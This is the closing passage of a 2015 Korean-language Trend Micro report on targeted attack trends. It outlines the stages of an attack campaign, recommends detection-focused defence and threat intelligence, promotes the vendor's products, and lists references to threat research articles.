그림 11. 표적 공격 캠페인의 구성 요소

표적 공격은 순환적으로 반복되는 특징을 가지고 있으며 따라서 요소들이 중복됩니다. 일례로, 시스템에 대한 액세스를

지속적으로 유지하고 있는 공격자들은 단 하나의 진입점만을 이용하지는 않을 것입니다. 이들은 가능하다면 네트워크의

여러 곳에 멀웨어를 설치하며 캠페인이 실행되는 동안 C&C 통신과 측면 확대가 지속적으로 이루어집니다. 데이터 유출

역시 일회성 활동이 아니며 여러 가지 요인들에 따라 더 많은 데이터를 지속적으로 유출할 수 있습니다. 마지막으로 표적

공격의 마지막 요소는 유지성이며 이를 통해 공격자는 다른 해커들이 실패한 공격을 이어받거나 이에 대처할 수 있는 특정

활동들을 실행합니다.

표적 공격의 증가와 공격 용이성 그리고 방어의 어려움으로 인해 네트워크 담당자는 보안에 대한 사고 방식을 방어에서

탐지로 전환할 때 필요한 것이 무엇인지 정확하게 이해해야 합니다. 즉 블랙리스트 기술이 공격자의 접근을 막아주지

못한다면 네트워크는 결국 표적 공격에 노출될 것입니다.

정보 수집 진입점 측면 확대 자산 검색 데이터 유출C&C 통신



네트워크 전반에서 일어나는 모든 일들을 지속적으로 통제하려면 경계, 트래픽 흐름 및 활동들을 완전하게 파악해야 합니다.

그리고 “오전 3시에 어떤 일이 발생될 경우 지점의 인터넷 활동을 표시하도록 네트워크 설정이 되어 있는가?” 또는 “회계

담당자나 연구 개발 책임자가 컴퓨터 간에 특정 파일을 전송할 때 이를 표시하도록 네트워크 설정이 되어 있는가?”와 같은

질문을 생각해보십시오.

표적 공격에 대응하기 위해선 위협 인텔리전스를 구축하는 것이 가장 중요합니다. 외부 보고서와 내부 기록 및 실시간

모니터링을 기반으로 공격자가 사용하는 도구, 전술 및 절차를 파악한다면 행동 지침이 될 수 있는 강력한 보안침해지표

데이터베이스를 구축하는데 도움이 될 것입니다. Trend Micro Deep Discovery와 같은 고급 위협 방어 제품은 보안

모니터링 전략을 확대하는데 도움이 될 것입니다.29 이 전략에는 사건 대응팀 구성 및 직원, 파트너 및 업체들을 대상으로

소셜 엔지니어링과 컴퓨터 보안에 대한 교육도 포함되어 있습니다.

우리는 포괄적인 “탐지-분석-대응”의 순환 방식을 이용하는 맞춤 방어 전략을 세워 조직에 대한 위협에 대처할 것을

권장합니다.30 이로써 위협에 대한 심층 정보를 제공하고 네트워크에 대한 고급 위협 탐지 기능을 제공하여 기존의 보안

솔루션으로는 파악하기 어려운 악성 콘텐츠(멀웨어), 통신 및 공격자 활동을 탐지할 수 있습니다.

“조만간 발표될 예정인 ‘Trend Micro-미주기구(OAS) 핵심 인프라 공격

설문조사’ Organization of American States (OAS) Critical Infra-

structure Attack Survey’ 응답자들의 44% 이상이 데이터 삭제 또는

데이터 무결성을 저해하는 공격을 받은 적이 있다고 답했습니다.”


—Tom Kellermann



References1. Trend Micro Threat Research Team. (2014). Trend Micro Security Intelligence. “Operation Arid Viper: Bypassing the Iron Dome.”

Last accessed on 27 March 2015, http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-operation-arid-viper.pdf.

2. Masayoshi Someya. (18 August 2014). TrendLabs Security Intelligence Blog. “Risks from Within: Learning from the Amtrak Data Breach.” Last accessed on March 27, 2015, http://blog.trendmicro.com/trendlabs-security-intelligence/risks-from-within-learning-from-the-amtrak-data-breach/.

3. Kyle Wilhoit and Jim Gogolinski. (16 October 2014). TrendLabs Security Intelligence Blog. “Sandworm to Blacken: The SCADA Connection.” Last accessed on 27 March 2015, http://blog.trendmicro.com/trendlabs-security-intelligence/sandworm-to-blacken-the-scada-connection/.

4. Bakuei Matsukawa, David Sancho, Lord Alfred Remorin, Robert McArdle, and Ryan Flores. (2014). Trend Micro Security Intelligence. “Predator Pain and Limitless: When Cybercrime Turns into Cyberspying.” Last accessed on 27 March 2015, http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-predator-pain-and-limitless.pdf.

5. Lambert Sun and Brooks Hong. (4 February 2015). TrendLabs Security Intelligence Blog. “Pawn Storm Update: iOS Espionage App Found.” Last accessed on 27 March 2015, http://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-update-ios-espionage-app-found/.

6. Feike Hacquebord. (24 October 2014). TrendLabs Security Intelligence Blog. “Operation Pawn Storm: Putting Outlook Web Access Users at Risk.” Last accessed on 27 March 2015, http://blog.trendmicro.com/trendlabs-security-intelligence/operation-pawn-storm-putting-outlook-web-access-users-at-risk/.

7. Ivan Fontarensky, Fabien Perigaud, Ronan Mouchoux, Cedric Pernet, and David Bizeul. (2014). Airbus Defence & Space. “Operation Pitty Tiger: The Eye of the Tiger.” Last accessed on 28 March 2015, http://bitbucket.cassidiancybersecurity.com/whitepapers/downloads/Pitty%20Tiger%20Final%20Report.pdf.

8. The Japan Times. (11 August 2014). The Japan Times News. “Benesse Suspect Gets Fresh Warrant Over Second Data Theft.” Last accessed on 28 March 2015, http://www.japantimes.co.jp/news/2014/08/11/national/crime-legal/benesse-suspect-gets-fresh-warrant-over-second-data-theft/#.VRYSDPmUfTp.

9. Jiji Kyodo. (17 July 2014). The Japan Times News. “Benesse Leak Suspect Held; Firm Plans Compensation.” Last accessed on 6 April 2015, http://www.japantimes.co.jp/news/2014/07/17/national/crime-legal/arrest-warrant-looms-systems-engineer-benesse-data-leak/#.VSJL-vmsUlc.

10. Trend Micro Incorporated. (2015). Threat Encyclopedia. “IOS_XAGENT.A.” Last accessed on 28 March 2015, http://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/IOS_XAGENT.A.

11. Jonathan Leopando. (12 April 2014). TrendLabs Security Intelligence Blog. “New Vulnerability Found in Popular Japanese Word Processor ‘Ichitaro.’” Last accessed on 28 March 2015, http://blog.trendmicro.com/trendlabs-security-intelligence/new-vulnerability-hits-popular-japanese-word-processor-ichitaro/.

12. Roland Dela Paz. (24 May 2012). TrendLabs Security Intelligence Blog. “Specially Crafted .HWP File Used for Korean Targeted Campaign.” Last accessed on 28 March 2015, http://blog.trendmicro.com/trendlabs-security-intelligence/specially-crafted-hwp-

.

13. Jay Yaneza. (16 February 2015). TrendLabs Security Intelligence Blog. “Signed PoS Malware Used in Preholiday Attacks, Linked to Targeted Attacks.” Last accessed on 28 March 2015, http://blog.trendmicro.com/trendlabs-security-intelligence/signed-pos-malware-used-in-pre-holiday-attacks-linked-to-targeted-attacks/.

14. Maersk Menrige. (17 June 2014). TrendLabs Security Intelligence Blog. “Template Document Exploit Found in Several Targeted Attacks.” Last accessed on 28 March 2015, http://blog.trendmicro.com/trendlabs-security-intelligence/template-document-exploit-found-in-several-targeted-attacks/.

15. Kervin Alintanahin. (2 July 2014). TrendLabs Security Intelligence Blog. “KIVARS with Venom: Targeted Attacks Upgrade with 64-Bit ‘Support.’” Last accessed on 28 March 2015, http://blog.trendmicro.com/trendlabs-security-intelligence/kivars-with-venom-targeted-attacks-upgrade-with-64-bit-support/.



16. Jay Yaneza. (29 December 2014). TrendLabs Security Intelligence Blog. “64-bit Version of HAVEX Spotted.” Last accessed on 28 March 2015, http://blog.trendmicro.com/trendlabs-security-intelligence/64-bit-version-of-havex-spotted/.

17. Trend Micro Incorporated. (5 December 2014). TrendLabs Security Intelligence Blog. “WIPALL Malware Leads to #GOP Warning in Sony Hack.” Last accessed on 28 March 2015, http://blog.trendmicro.com/trendlabs-security-intelligence/wipall-malware-leads-to-gop-warning-in-sony-hack/.

18. Command Five Pty. Ltd. (September 2011). Command Five. “SK Hack by an Advanced Persistent Threat.” Last accessed on 28 March 2015, .

19. Benson Sy. (19 January 2015). TrendLabs Security Intelligence Blog.Legends, Path of Exile.” Last accessed 28 March 2015, http://blog.trendmicro.com/trendlabs-security-intelligence/plugx-

.

20. Christopher Daniel So. (18 August 2014). TrendLabs Security Intelligence Blog. “BIFROSE Now More Evasive Through Tor, Used for Targeted Attack.” Last accessed on 28 March 2015, http://blog.trendmicro.com/trendlabs-security-intelligence/bifrose-now-more-evasive-through-tor-used-for-targeted-attack/.

21. Maersk Menrige. (25 June 2014). TrendLabs Security Intelligence Blog. “PlugX RAT with ‘Time Bomb’ Abuses Dropbox for Command-and-Control Settings.” Last accessed on 28 March 2015, http://blog.trendmicro.com/trendlabs-security-intelligence/plugx-rat-with-time-bomb-abuses-dropbox-for-command-and-control-settings/.

22. Trend Micro Incorporated. (12 May 2014). TrendLabs Security Intelligence Blog. “Targeted Attack Against Taiwanese Agencies Used Recent Microsoft Word Zero Day.” Last accessed on 28 March 2015, http://blog.trendmicro.com/trendlabs-security-intelligence/targeted-attack-against-taiwanese-agencies-used-recent-microsoft-word-zero-day/.

23. Microsoft. (2014). Security TechCenter. “Microsoft Security Bulletin MS14-021—Critical.” Last accessed on 28 March 2015, https://technet.microsoft.com/library/security/ms14-021.

24. William Gamazo Sanchez. (10 November 2014). TrendLabs Security Intelligence Blog. “Timeline of Sandworm Attacks.” Last accessed on 28 March 2015, http://blog.trendmicro.com/trendlabs-security-intelligence/timeline-of-sandworm-attacks/.

25. Jonathan Leopando. (21 October 2014). TrendLabs Security Intelligence Blog. “Microsoft Windows Hit by New Zero-Day Attack.” Last accessed on 28 March 2015, http://blog.trendmicro.com/trendlabs-security-intelligence/microsoft-windows-hit-by-new-zero-day-attack/.

26. Kervin Alintanahin. (17 June 2014). TrendLabs Security Intelligence Blog. “PLEAD Targeted Attacks Against Taiwanese Government Agencies.” Last accessed on 28 March 2015, http://blog.trendmicro.com/trendlabs-security-intelligence/plead-targeted-attacks-against-taiwanese-government-agencies-2.

27. Jayronn Christian Bucu. (18 September 2014). TrendLabs Security Intelligence Blog. “EvilGrab Malware Family Used in Targeted Attacks in Asia.” Last accessed on 28 March 2015, http://blog.trendmicro.com/trendlabs-security-intelligence/evilgrab-malware-family-used-in-targeted-attacks-in-asia/.

28. Loucif Kharouni. (2014). Trend Micro Security Intelligence. “Cybercriminals Use What Works: Targeted Attack Methodologies for Cybercrime.” Last accessed on 28 March 2015, http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cybercriminals-use-what-works.pdf.

29. Trend Micro Incorporated. (2015). Trend Micro. “Deep Discovery: Advanced Network Security.” Last accessed on 1 April 2015, http://www.trendmicro.com/us/enterprise/security-risk-management/deep-discovery/.

30. Trend Micro Incorporated. (2015). Trend Micro. “Custom Defense Against Targeted Attacks.” Last accessed on 6 April 2015, http://www.trendmicro.com/cloud-content/us/pdfs/business/white-papers/wp_custom-defense-against-targeted-attacks.pdf.

Created by:

The Global Technical Support & R&D Center of TREND MICRO

©2015 by Trend Micro, Incorporated. All rights reserved. Trend Micro and the Trend Micro t-ball logo are trademarks or registered trademarks of Trend Micro, Incorporated. All other product or company names may be trademarks or registered trademarks of their owners.

TREND MICRO TM

Trend Micro Incorporated, a global cloud security leader, creates

a world safe for exchanging digital information with its Internet

content security and threat management solutions for businesses and

consumers. A pioneer in server security with over 20 years experience,

we deliver top-ranked client, server, and cloud-based security that

fits our customers’ and partners’ needs; stops new threats faster; and

protects data in physical, virtualized, and cloud environments. Powered

by the Trend Micro™ Smart Protection Network™ infrastructure, our

industry-leading cloud-computing security technology, products and

services stop threats where they emerge, on the Internet, and are

supported by 1,000+ threat intelligence experts around the globe. For

additional information, visit www.trendmicro.co.kr

한국트렌드마이크로

서울 강남구 대치동 945-1 홍우빌딩 6층 (우 135-846)

www.trendmicro.co.kr

Tel. 02-561-0990

E-mail. [email protected]

표적 공격 동향 - Trend Micro€¦ · 피티 타이거는 Pitty와 Paladin 원격 액세스...

Documents

Transcript of 표적 공격 동향 - Trend Micro€¦ · 피티 타이거는 Pitty와 Paladin 원격 액세스...